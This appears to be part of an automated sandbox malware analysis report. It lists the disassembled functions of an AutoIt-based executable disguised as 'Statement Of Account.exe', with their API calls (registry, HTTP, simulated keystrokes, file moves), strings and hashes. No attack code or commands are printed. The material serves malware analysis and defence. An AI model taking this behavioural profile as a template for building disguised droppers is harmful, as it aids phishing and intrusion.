Opcode Fuzzy Hash: d48da594d57f6aadbcc7a695fec4cf75dc39f6aec1ddb07572db38b207896a5c
Instruction Fuzzy Hash: 6091B272204341AFD720DF64D880EABB7E9EFC4314F50891EF28987291D7B9AD45C766

Function 0046A75F Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 179registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046A84D

Strings

HH, xrefs: 0046A7A4

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: ConnectRegistry_wcslen
String ID: HH
API String ID: 535477410-2761332787
Opcode ID: 95544a26956fe54eb2a8636236a3b10fc217bfdb2bff17811b2f45cb9df4731a
Instruction ID: 68d8ff7817732ac0dd8275009c421e29eb5870de2046e22f9b94a35ba54c9d9f
Opcode Fuzzy Hash: 95544a26956fe54eb2a8636236a3b10fc217bfdb2bff17811b2f45cb9df4731a
Instruction Fuzzy Hash: FE617FB56083009FD304EF65C981F6BB7E4AF88704F14891EF681A7291D678ED09CB97

Function 0045F2C5 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 146windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0045F317
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0045F367
IsMenu.USER32(?), ref: 0045F380
CreatePopupMenu.USER32 ref: 0045F3C5
GetMenuItemCount.USER32(?), ref: 0045F42F
InsertMenuItemW.USER32(?,?,00000001,?), ref: 0045F45B

Strings

2, xrefs: 0045F39E
0, xrefs: 0045F30F

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID: 0$2
API String ID: 3311875123-3793063076
Opcode ID: fbdd9a11e44187a4bf70f7de18f8631e861f84fad9f8f26dcc1fb12baf34abbc
Instruction ID: 6c7ab59355789d00cbd42ef361c1bd9312a1bc9220e92816940967e3bd29aecc
Opcode Fuzzy Hash: fbdd9a11e44187a4bf70f7de18f8631e861f84fad9f8f26dcc1fb12baf34abbc
Instruction Fuzzy Hash: E451CF702043409FD710CF69D888B6BBBE4AFA5319F104A3EFD9586292D378994DCB67

Function 0043717F Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,004A8E80,00000100,00000100,?,C:\Users\user\Desktop\Statement Of Account.exe), ref: 0043719E
LoadStringW.USER32(00000000), ref: 004371A7
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 004371BD
LoadStringW.USER32(00000000), ref: 004371C0
_printf.LIBCMT ref: 004371EC
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00437208

Strings

%s (%d) : ==> %s: %s %s, xrefs: 004371E7
C:\Users\user\Desktop\Statement Of Account.exe, xrefs: 00437189

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: HandleLoadModuleString$Message_printf
String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\Desktop\Statement Of Account.exe
API String ID: 220974073-2507872188
Opcode ID: 94d1ddb87e9fdddd1f0eb85761e890ae026325719f266e56d7856026e6b64315
Instruction ID: cc9e6972dbc5209964c20f0f7d1f7455a13934f6c555fd98bc0bf92a0502fb90
Opcode Fuzzy Hash: 94d1ddb87e9fdddd1f0eb85761e890ae026325719f266e56d7856026e6b64315
Instruction Fuzzy Hash: F7014FB2A543447AE620EB549D06FFB365CABC4B01F444C1EB794A60C0AAF865548BBA

Function 00456168 Relevance: 13.7, APIs: 9, Instructions: 181COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b00adbc1ea9d53563bb8a7982d93c3fa4b8356126e06b3aad1cc727703ca6f1a
Instruction ID: 20732dcab93056f759d0b04a6df1a57780e33876730225f1fefd21ccf2a16f59
Opcode Fuzzy Hash: b00adbc1ea9d53563bb8a7982d93c3fa4b8356126e06b3aad1cc727703ca6f1a
Instruction Fuzzy Hash: 36519070200301ABD320DF29CC85F5BB7E8EB48715F540A1EF995E7292D7B4E949CB29

Function 004534EB Relevance: 13.6, APIs: 9, Instructions: 150filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Statement Of Account.exe,?,C:\Users\user\Desktop\Statement Of Account.exe,004A8E80,C:\Users\user\Desktop\Statement Of Account.exe,0040F3D2), ref: 0040FFCA

Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9

lstrcmpiW.KERNEL32(?,?), ref: 0045355E
MoveFileW.KERNEL32(?,?), ref: 0045358E

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: File$AttributesFullMoveNamePathlstrcmpi
String ID:
API String ID: 978794511-0
Opcode ID: 905b41a6b5f1f1e7811aa1c06e555ad1605d40905c9a381d53b63ac73f12040d
Instruction ID: dcad70f49e32ae1adaf0c812d378eb0bba467e0a617048934f4a65f03e3a0b24
Opcode Fuzzy Hash: 905b41a6b5f1f1e7811aa1c06e555ad1605d40905c9a381d53b63ac73f12040d
Instruction Fuzzy Hash: 665162B25043406AC724EF61D885ADFB3E8AFC8305F44992EB94992151E73DD34DC767

Function 004417BC Relevance: 13.6, APIs: 9, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2697ea5a26a9fc7488a3d070abad83f7d669ddccf749f4bfc66ff3ac1f4b4023
Instruction ID: b1e2397247e50d0c7000acf5a2db8631a214b417b603bec0598d849dd48054e0
Opcode Fuzzy Hash: 2697ea5a26a9fc7488a3d070abad83f7d669ddccf749f4bfc66ff3ac1f4b4023
Instruction Fuzzy Hash: E54128332402806BE320A75DB8C4ABBFB98E7A2362F50443FF18196520D76678C5D339

Function 00445CF9 Relevance: 13.6, APIs: 9, Instructions: 69sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 0044593E: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 0044595D
Part of subcall function 0044593E: GetCurrentThreadId.KERNEL32 ref: 00445964
Part of subcall function 0044593E: AttachThreadInput.USER32(00000000,?,00000001,00478FA7), ref: 0044596B

MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D15
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00445D35
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00445D3F
MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D45
PostMessageW.USER32(00000000,00000100,00000027,00000000), ref: 00445D66
Sleep.KERNEL32(00000000), ref: 00445D70
MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D76
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00445D8B
Sleep.KERNEL32(00000000,?,00000101,00000027,00000000), ref: 00445D8F

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 621277f82d70151dd5f553487d646ea3797e8fa9e9e6e4ab5ab83039983e6254
Instruction ID: b085f3065cf9cd100f04f322da00d4b037e108fc79bf5967fdabce1cd6d2e74b
Opcode Fuzzy Hash: 621277f82d70151dd5f553487d646ea3797e8fa9e9e6e4ab5ab83039983e6254
Instruction Fuzzy Hash: 7B116971790704B7F620AB958C8AF5A7399EF88B11F20080DF790AB1C1C9F5E4418B7C

Function 0045427D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 259libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,00000000), ref: 0045435B
GetProcAddress.KERNEL32(?,AU3_FreeVar), ref: 00454371
_malloc.LIBCMT ref: 004543B1
_strlen.LIBCMT ref: 00454409
_malloc.LIBCMT ref: 00454413
_strcat.LIBCMT ref: 00454420

Strings

AU3_FreeVar, xrefs: 0045436B

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: AddressProc_malloc$_strcat_strlen
String ID: AU3_FreeVar
API String ID: 2184576858-771828931
Opcode ID: 4909a4179154194bbb5ad4651ae7e3d2ad5cecafef5c208f0853367efa8f6917
Instruction ID: c940ad03d776ce5ee908f8b881b33357b51647545ffc53e819ca791e1fdac2da
Opcode Fuzzy Hash: 4909a4179154194bbb5ad4651ae7e3d2ad5cecafef5c208f0853367efa8f6917
Instruction Fuzzy Hash: EDA18DB5604205DFC300DF59C480A2AB7E5FFC8319F1489AEE9554B362D739ED89CB8A

Function 0044AA1F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 171networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AA5A
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AA8D
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0044AAF9
InternetSetOptionW.WININET(00000000,0000001F,?,00000004), ref: 0044AB11
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB20
HttpQueryInfoW.WININET(00000000,00000005,?,00000000,00000000), ref: 0044AB61

Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880

Strings

, xrefs: 0044AB59

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
String ID:
API String ID: 1291720006-3916222277
Opcode ID: fd0d9a71f1b9f9aed2e07c44adb1cce69882d59a8a6dee97d1abd644e851efd9
Instruction ID: 782b6278bf246bef60821ca34847c3ce69a0d92f774604c9678bedd135ce19ea
Opcode Fuzzy Hash: fd0d9a71f1b9f9aed2e07c44adb1cce69882d59a8a6dee97d1abd644e851efd9
Instruction Fuzzy Hash: 9C51E6B12803016BF320EB65CD85FBBB7A8FB89704F00091EF74196181D7B9A548C76A

Function 0046BB59 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 168networkCOMMON

Download Yara Rule

APIs

select.WS2_32 ref: 0046BD1C
WSAGetLastError.WS2_32(00000000), ref: 0046BD2C

Strings

HH, xrefs: 0046BB8A

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: ErrorLastselect
String ID: HH
API String ID: 215497628-2761332787
Opcode ID: 81123ba87c51c271d749794d4387e1d0575ba96382d8685f9443cecf8545e782
Instruction ID: a252b81ccbce03d1e7b1b0efababa2c0a0929072778302a7b1202b90a7697d70
Opcode Fuzzy Hash: 81123ba87c51c271d749794d4387e1d0575ba96382d8685f9443cecf8545e782
Instruction Fuzzy Hash: BF51E4726043005BD320EB65DC42F9BB399EB94324F044A2EF558E7281EB79E944C7AA

Function 0047D2F8 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 162COMMON

Download Yara Rule

APIs

__wcsicoll.LIBCMT ref: 0047D39F
__snwprintf.LIBCMT ref: 0047D43B
_wcscpy.LIBCMT ref: 0047D4D0

Strings

0vH, xrefs: 0047D4F9
CALLARGARRAY, xrefs: 0047D393
, $, xrefs: 0047D47B
AUTOITCALLVARIABLE%d, xrefs: 0047D42F

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: __snwprintf__wcsicoll_wcscpy
String ID: , $$0vH$AUTOITCALLVARIABLE%d$CALLARGARRAY
API String ID: 1729044348-3708979750
Opcode ID: 19d8c814bf70bb05cadf871115a188aa6336bc7b5c41e4e48777219efcb9f973
Instruction ID: 823d0c4529048d9f890bbf28e75db1a658c609af9319d28fcdda535ef0d13f31
Opcode Fuzzy Hash: 19d8c814bf70bb05cadf871115a188aa6336bc7b5c41e4e48777219efcb9f973
Instruction Fuzzy Hash: E651A571514300ABD610EF65C882ADFB3A4EFC4348F048D2FF54967291D779E949CBAA

Function 0046FD7F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 0046FD8A
SendMessageW.USER32(?,00001109,00000000,00000000), ref: 0046FE0E
SendMessageW.USER32(?,0000113E,00000000,?), ref: 0046FEA5
SendMessageW.USER32(?,0000113F,00000000,?), ref: 0046FEDF
GetClientRect.USER32(?,?), ref: 0046FEF2
DestroyCursor.USER32(?), ref: 0046FFCC

Strings

2, xrefs: 0046FE9D

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: MessageSend$ClientCursorDestroyExtractIconRect
String ID: 2
API String ID: 1821208316-450215437
Opcode ID: 0839cb131ab93339cce718f32a9fb856b385d6e902e652cc812f2dbbb554e4d7
Instruction ID: e79942d1a0196d9b5e30c5c178d8ccafd59c9ae1e7fac48b8759c586c5a3b44e
Opcode Fuzzy Hash: 0839cb131ab93339cce718f32a9fb856b385d6e902e652cc812f2dbbb554e4d7
Instruction Fuzzy Hash: EB51AC702043019FD320CF44D885BAABBE5FB88700F04487EE684872A2D7B5A849CB5A

Function 00450E7D Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120COMMON

Download Yara Rule

Strings

static, xrefs: 00450EC3

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID:
String ID: static
API String ID: 0-2160076837
Opcode ID: 88f11647011456fbb04f7235260bd1d02a964e72c1c4e3b3fb6640230c73d37f
Instruction ID: 4605c95b1b006c90d65e271c0fdf07f62d21d56273c2870bf7f2e3decf5281c5
Opcode Fuzzy Hash: 88f11647011456fbb04f7235260bd1d02a964e72c1c4e3b3fb6640230c73d37f
Instruction Fuzzy Hash: 4531B572200300BBD7109B64DC45F6BB3A8EBC9711F204A2EFA50D72C0D7B4E8048B69

Function 0044BBC9 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 100filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Statement Of Account.exe,?,C:\Users\user\Desktop\Statement Of Account.exe,004A8E80,C:\Users\user\Desktop\Statement Of Account.exe,0040F3D2), ref: 0040FFCA

lstrcmpiW.KERNEL32(?,?), ref: 0044BC04
MoveFileW.KERNEL32(?,?), ref: 0044BC38
_wcscat.LIBCMT ref: 0044BCAA
_wcslen.LIBCMT ref: 0044BCB7
_wcslen.LIBCMT ref: 0044BCCB
SHFileOperationW.SHELL32 ref: 0044BD16

Strings

\*.*, xrefs: 0044BCA4

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
String ID: \*.*
API String ID: 2326526234-1173974218
Opcode ID: 79917c867e5dc746cbfe3ebb0135d92afbab4952e7fca4f485a184e9ce72b521
Instruction ID: 9e4979448571685848097db6772507fbfe8bfb8d1337cd0032b1ea927bdad9db
Opcode Fuzzy Hash: 79917c867e5dc746cbfe3ebb0135d92afbab4952e7fca4f485a184e9ce72b521
Instruction Fuzzy Hash: 4B3183B14083019AD724EF21C5D5ADFB3E4EFC8304F444D6EB98993251EB39E608D7AA

Function 004366BE Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90COMMON

Download Yara Rule

APIs

Part of subcall function 00436328: _wcsncpy.LIBCMT ref: 0043633C

_wcslen.LIBCMT ref: 004366DD
GetFileAttributesW.KERNEL32(?), ref: 00436700
GetLastError.KERNEL32 ref: 0043670F
CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00436727
_wcsrchr.LIBCMT ref: 0043674C

Part of subcall function 004366BE: CreateDirectoryW.KERNEL32(?,00000000,?,00000000,00000000), ref: 0043678F

Strings

\, xrefs: 004366E9

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

